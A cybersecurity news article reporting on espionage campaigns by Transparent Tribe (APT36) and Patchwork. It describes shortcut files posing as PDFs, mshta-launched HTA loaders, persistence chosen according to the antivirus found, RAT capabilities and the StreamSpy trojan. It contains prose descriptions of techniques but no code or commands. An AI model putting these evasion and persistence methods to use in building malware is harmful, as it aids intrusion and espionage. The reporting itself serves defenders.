Transparent Tribe Expands Espionage Campaigns Using Advanced RAT Techniques
A long-running cyber espionage group known as Transparent Tribe has been linked to a new wave of targeted attacks aimed at Indian government bodies, academic institutions, and other strategically sensitive organizations. The campaign relies on a remote access trojan (RAT) that allows attackers to maintain long-term, covert control over infected systems.
Recent technical analysis shows that the attackers are using deceptive delivery methods to bypass user suspicion. One of the key techniques involves a malicious Windows shortcut (LNK) file disguised as a harmless PDF document. The file even contains real PDF content, making it appear legitimate when opened.
Transparent Tribe, also tracked as APT36, has a history of cyber espionage activity focused primarily on Indian targets. The group has been active for over a decade and is widely believed to operate with state backing. Over the years, it has continuously refined its malware toolkit to stay ahead of detection.
An Evolving Malware Arsenal
The group is known for rotating and upgrading its remote access tools. Previous campaigns have used malware families such as CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT. The latest attacks continue this trend, demonstrating a high level of adaptability and technical maturity.
The infection chain begins with a spear-phishing email that delivers a ZIP archive. Inside the archive is a shortcut file made to look like a PDF. When the victim opens it, the file silently launches a hidden HTML Application (HTA) using the legitimate Windows utility mshta.exe.
This HTA script decrypts and loads the final RAT payload directly into memory, reducing its footprint on disk and making detection harder. At the same time, it opens a decoy PDF for the user, reinforcing the illusion that nothing unusual has occurred.
To ensure the malware runs smoothly across different environments, the script interacts with Windows components using ActiveX objects. This allows it to profile the system, adapt its behavior, and increase execution reliability.
Smart Persistence Based on Antivirus Detection
One of the more notable features of this campaign is how it adjusts persistence techniques based on the security software found on the victim’s machine.
- If Kaspersky is present, the malware creates a hidden working directory under a public user path, writes an obfuscated HTA file to disk, and establishes persistence using a startup shortcut that relaunches the script via mshta.exe.
- If Quick Heal is detected, it drops a batch file and a malicious shortcut in the Startup folder, using the batch file to execute the HTA payload.
- If Avast, AVG, or Avira are installed, the payload is copied directly into the Startup directory and executed.
- If no known antivirus is found, the malware falls back on a mix of registry-based persistence, batch execution, and payload deployment before launching itself.
This flexible approach helps the threat remain active even in environments with endpoint protection.
Full-Featured RAT Capabilities
A secondary HTA file drops a DLL named iinneldc.dll, which functions as a complete remote access trojan. Once active, it allows attackers to remotely control the system, manage files, steal data, capture screenshots, manipulate the clipboard, and manage running processes.
Security researchers note that Transparent Tribe remains highly focused and persistent, with a clear intelligence-gathering objective centered on Indian government, education, and other high-value sectors.
A Parallel Campaign Using Government-Themed Lures
In a related operation observed recently, the same group has been linked to another shortcut-based attack that impersonates an official government advisory PDF. The file name closely resembles a legitimate document, increasing the likelihood of user interaction.
When opened, the shortcut executes a hidden command through cmd.exe, which downloads an MSI installer from a remote domain. This installer performs several actions, including:
- Displaying a legitimate-looking decoy PDF to distract the victim
- Writing malicious DLL files to system directories
- Dropping and executing a loader executable after a short delay
- Creating registry-based persistence so the malware runs automatically after reboot
Interestingly, the decoy document used in this campaign is a genuine advisory issued in 2024 by Pakistan’s national cyber emergency authority, warning about malware delivered through fake WhatsApp messages. The attackers reused the real document to increase credibility.
Command-and-Control and Long-Term Access
One of the deployed DLLs connects to a hard-coded command-and-control server registered earlier in 2025. Although the server is currently inactive, the malware’s registry-based persistence ensures the threat can be reactivated if the infrastructure comes back online.
The malware communicates using multiple HTTP-based endpoints designed to register infected systems, send heartbeat signals, receive commands, and adjust behavior in virtualized environments. To evade detection, endpoint strings are stored in reverse order and reconstructed at runtime.
The malware also surveys installed antivirus software, further enhancing its reconnaissance and evasion capabilities.
Patchwork and the Emergence of StreamSpy
Around the same time, another threat group known as Patchwork—also referred to as Dropping Elephant or Maha Grass—has been connected to attacks targeting Pakistan’s defense sector. These attacks involve a Python-based backdoor delivered through phishing emails containing ZIP archives.
Inside the archive is a malicious MSBuild project. When executed using msbuild.exe, it deploys a dropper that installs and launches the Python RAT. The malware can execute remote commands, load Python modules, and transfer files to and from the compromised system.
By late 2025, Patchwork was also linked to a previously undocumented trojan called StreamSpy. This malware uses both WebSocket and HTTP channels for command-and-control communication, making traffic analysis and detection more difficult.
StreamSpy Capabilities and Distribution
StreamSpy is distributed through ZIP files hosted on cloud-based domains. The main executable can collect system information, establish persistence through registry keys, scheduled tasks, or startup shortcuts, and communicate with its operators using multiple protocols.
The malware supports a wide range of commands, including file downloads, uploads, deletion, renaming, disk enumeration, and execution of both cmd and PowerShell instructions.
Researchers have noted similarities between StreamSpy and earlier malware families linked to other regional threat actors, suggesting shared tooling or collaboration between groups.
Final Thoughts
These campaigns highlight how advanced threat actors continue to refine social engineering, malware delivery, and persistence techniques. By blending legitimate tools, real documents, and adaptive behavior, groups like Transparent Tribe and Patchwork remain difficult to detect and disrupt.
For organizations in high-risk sectors, the activity underscores the importance of strong email security, user awareness, endpoint visibility, and continuous monitoring for suspicious behavior rather than reliance on signature-based detection alon